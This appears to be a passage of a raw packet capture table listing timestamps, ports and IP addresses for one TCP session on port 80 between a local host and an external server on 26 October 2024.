Oct 26, 2024 07:27:23.458221912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458239079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458240032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458250046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458261013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458277941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458285093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458297968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458301067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458309889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458317041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458336115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458338022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458347082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458348036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458364964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458369017 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458388090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458405972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458417892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458420992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458436966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458442926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458450079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458458900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458461046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458476067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458477974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458487988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458499908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458512068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458520889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458520889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458520889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458520889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458523989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458540916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458556890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458569050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458597898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458606005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458646059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458719969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458738089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458749056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458758116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458765030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458786011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458786964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458800077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458823919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458831072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458842039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458874941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458889961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458903074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458914042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458928108 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458937883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458960056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458961964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458975077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458987951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458996058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459001064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459002972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459021091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459022045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459034920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459041119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459049940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459059000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459063053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459079981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459080935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459105015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459129095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459152937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459165096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459176064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459187984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459202051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459212065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459239006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459250927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459268093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459275961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459280014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459285975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459294081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459304094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459305048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459321976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459322929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459336996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459342003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459393024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459408045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459419966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459427118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459451914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459465027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459477901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459494114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459517002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459523916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459537029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459547997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459558964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459563017 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459569931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459582090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459589005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459594011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459615946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459640980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459640980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459660053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459672928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459682941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459685087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459697962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459707975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459711075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459717989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459738970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459750891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459774017 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459781885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459794998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459836006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459837914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459837914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459849119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459860086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459872007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459887981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459892035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459902048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459908009 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459914923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459922075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459928989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459934950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459939957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.459968090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459989071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.459989071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460014105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460025072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460038900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460051060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460068941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460088015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460095882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460107088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460117102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460139036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460148096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460450888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460460901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460496902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460509062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460597992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460611105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460623026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460633993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460638046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460649014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460656881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460661888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460679054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460694075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460705042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460705996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460719109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460728884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460731030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460748911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460753918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460762024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460774899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460777044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460787058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460803032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460807085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460829020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460829973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460843086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460843086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460855961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460871935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460875034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460886955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460886955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460897923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460913897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460931063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460937977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460946083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460968971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460969925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460985899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.460994959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.460998058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461007118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461015940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461028099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461030960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461041927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461044073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461057901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461066961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461091042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461117983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461128950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461131096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461147070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461153984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461160898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461172104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461173058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461190939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461190939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461204052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461208105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461216927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461230040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461239100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461252928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461256981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461265087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461277008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461281061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461289883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461303949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461308956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461324930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461327076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461338997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461342096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461349964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.461365938 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.461384058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.501101971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501121998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501135111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501147032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501152039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.501159906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.501164913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501178980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.501194954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.501219988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.511965990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.511987925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512001038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512051105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512063980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512077093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512088060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512089968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512116909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512139082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512140989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512154102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512166023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512180090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512190104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512191057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512213945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512228966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512249947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512262106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512273073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512285948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.512300014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.512322903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515530109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515541077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515558958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515578032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515588999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515600920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515602112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515633106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515651941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515666008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515677929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515691042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515702009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515713930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515716076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515727043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.515742064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.515758991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531178951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531213045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531224966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531266928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531272888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531280041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531292915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531302929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531337023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531349897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531371117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531387091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531404972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531416893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531424999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531429052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531447887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531452894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531467915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531469107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531482935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531495094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531497002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531508923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531511068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531522036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531534910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531538010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531560898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531584978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531689882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531702042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.531754971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531754971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.531980038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532035112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532047033 CEST	80	49982	185.215.113.84	192.168.2.7
